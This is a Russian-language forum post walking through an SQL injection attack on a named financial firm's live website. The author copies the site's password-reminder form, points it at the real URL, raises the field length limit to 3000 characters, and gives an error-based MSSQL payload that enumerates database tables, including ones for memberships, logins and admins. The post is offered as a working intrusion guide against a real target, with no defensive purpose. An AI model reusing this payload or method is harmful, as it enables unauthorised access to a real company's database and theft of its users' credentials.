sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
ну ладно…. расскажу всё по порядку, кому интересно смотрите и вкуриваьте… но вот если попробовать перебирать таблицы, то возникает проблема: количество символов в поле ретрива ограничено. поэтому идем другим путем: открываем исходный код страницы и берем оттуда фрагмент: <h1>Login Reminder</h1> <p>Enter the email we have on record for you, click on "Send Login," and your login information will be mailed immediately to that address.</p><br /><form name="frmForgot" method="post" action="/forgot.asp" onSubmit="return EditCheck();"> <input type="hidden" name="submitted" value="true"> <input type="hidden" name="where" value="">Your Email: <input type="text" name="email" class="formBox" size="30" maxlength="100" value=""><br /><br /> <input type="submit" class="formButton" value="Send Login"> <input type="button" class="formButton" value="Cancel" onClick="document.location.href='login.asp?where=';"> </form><script language="javascript"> function EditCheck() { if (CheckNull('frmForgot','email','Please enter your Email Address.')) { return false; } if (CheckEmail('frmForgot','email','The email address you entered\ndoes not appear to be valid.')) { return false; } } document.frmForgot.email.focus(); </script> создаем у себя на винте файл html, в который копирем этот код между тегами и немного его видоизменяем: <html> <h1>Login Reminder</h1> <p>Enter the email we have on record for you, click on "Send Login," and your login information will be mailed immediately to that address.</p><br /><form name="frmForgot" method="post" action="https://www.centennialfunds.com/forgot.asp" onSubmit="return EditCheck();"> <input type="hidden" name="submitted" value="true"> <input type="hidden" name="where" value="">Your Email: <input type="text" name="email" class="formBox" size="100" maxlength="3000" value=""><br /><br /> <input type="submit" class="formButton" value="Send Login"> <input type="button" class="formButton" value="Cancel" onClick="document.location.href='login.asp?where=';"> </form><script language="javascript"> function EditCheck() { if (CheckNull('frmForgot','email','Please enter your Email Address.')) { return false; } if (CheckEmail('frmForgot','email','The email address you entered\ndoes not appear to be valid.')) { return false; } } document.frmForgot.email.focus(); </script> <div id="foo" runat="server"> <p><br /><br /><br /><br />Copyright <script type="text/javascript"> </html> прописываем урл сайта и увеличиваем колличество символов в поле: maxlength="3000" я сначала поставил 1000, но не хватило. и потом уже перебираем имена таблиц и полей: 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('centPhotos','centCharts','centFundsReturnMonthly ','centFunds','aspnet_Applications','aspnet_Member ship','aspnet_Paths','aspnet_PersonalizationAllUse rs','aspnet_PersonalizationPerUser','aspnet_Profil e','aspnet_Roles','aspnet_SchemaVersions','AspNet_ SqlCacheTablesForChangeNotification','aspnet_Users ','aspnet_UsersInRoles','aspnet_WebEvent_Events',' centFundsInfo','centFundsPerformance','centFundsPe rformanceHeaders','centFundsReturnCumulative','cen tFundsReturnCumulativeHeaders','centFundsReturnMon thlyHeaders','centFundsStrategy','centFundsStrateg yHeaders','centGlossaryGeneral','centGlossaryStrat egy','centPeople','cmsContent','cmsSiteMap','cpAdm in','cpAdvisors','cpCalendarFiles','cpCustomers',' cpDiligence','cpEvents','cpFlashes','cpFunds','cpL inks','cpLogins','cpManagers','cpNewsletters','cpS naps','cpXref','dtproperties','sysconstraints','sy ssegments','vw_aspnet_Applications','vw_aspnet_Mem bershipUsers','vw_aspnet_Profiles','vw_aspnet_Role s','vw_aspnet_Users','vw_aspnet_UsersInRoles','vw_ aspnet_WebPartState_Paths','vw_aspnet_WebPartState _Shared','vw_aspnet_WebPartState_User'))– только не забудьте, это Post запрос, поэтому никаких плюсов в нем ставить не надо, только пробелы.
|